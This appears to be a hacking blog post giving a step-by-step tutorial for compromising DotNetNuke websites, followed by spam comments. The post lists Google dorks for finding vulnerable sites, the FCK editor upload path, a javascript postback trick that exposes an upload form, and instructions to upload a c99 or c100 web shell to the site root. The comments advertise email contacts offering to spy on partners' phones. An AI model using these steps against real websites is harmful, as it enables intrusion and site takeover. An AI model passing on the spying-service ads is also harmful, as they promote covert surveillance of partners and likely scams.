PORTAL HACKING DNN - WEBSITE HACKING

PORTAL HACKING DNN - WEBSITE HACKING



















Welcome to "blackbackhackers - An approach to introduce people with the truth of HACKING". Today i introduce with one more hacking method called "Portal Hacking (DNN)".

In this tutorial I will tell you how hackers use a simple dot net nuke exploit to hack a website.


WEBSITE HACKING WITH DNN ATTACK
  • Open Google and search for 
inurl:/tabid/36/language/en-US/Default.aspx 
                                                                 inurl:”/portals/0″ 

This is a dork to find the Portal Vulnerable sites, use it wisely. 
  •  For example take this site.
http://www.victim.com/Home/tabid/36/Language/en-US/Default.aspx 
  • Now replace
/Home/tabid/36/Language/en-US/Default.aspx

With this link 

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

Link option is displayed on your browser 
Now a website is vulnerable to this type of attack 
  • Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')
  • You will Find the Upload Option 
  • Select Root 
  • Upload your package Your Shell c99,c100 etc etc. The hacker could upload any image on victims website.

Comments

  1. follow the steps given here to download, install and activate ms office on your pc using www.office.com/setup,
    office.com/setup or
    office setup

    www.office.com/setup,
    office.com/setup or
    office setup

    ReplyDelete
  2. Are you worried about infidelity from your partner?
    You need not to be concerned again as now you can see where they are who they text
    Try out Fasthack29@gmail.com and you'd be glad

    ReplyDelete
  3. Ever thought the one you love is just playing with your emotions, then try out Guruspy32@gmail.com just like I did and it turned out my girlfriend was just lieing to me all along. She's now my ex though

    ReplyDelete
  4. I fell in love with my heart but I decided to use my head and took the decision to spy on my potential boyfriends's phone through the help of
    Hackerlite50@gmail.com and I found the worst. Apparently his plan was to lure me into a relationship and turn me to his sex machine. I knew this when I saw his conversation with his best friend

    ReplyDelete
    Replies
    1. Thanks for sharing .. they got me access to my partners devices ..I could see his bad intentions towards me

      Delete
  5. Fasthack29@gmailcom helped me recovered deleted messages from my spouse’s phone. I finally have proof she’s cheating.

    ReplyDelete
  6. This days Male and female can’t be trusted anymore I’ve trust several people which later on betrayed me I contacted and explained my problems to him immediately which he got my job delivered within 24 hours I’m so glad I followed my instinct. GURUSPY32@gmail.com is the best out there
    ...see more

    ReplyDelete

Post a Comment

Popular posts from this blog

HOW TO TRACE MOBILE NUMBER , IP ADDRESS , BULK SMS SENDER , LANDLINE NUMBER ???

HOW TO HACK EMAIL ACCOUNT: GMAIL, FACEBOOK, YAHOO HOTMAIL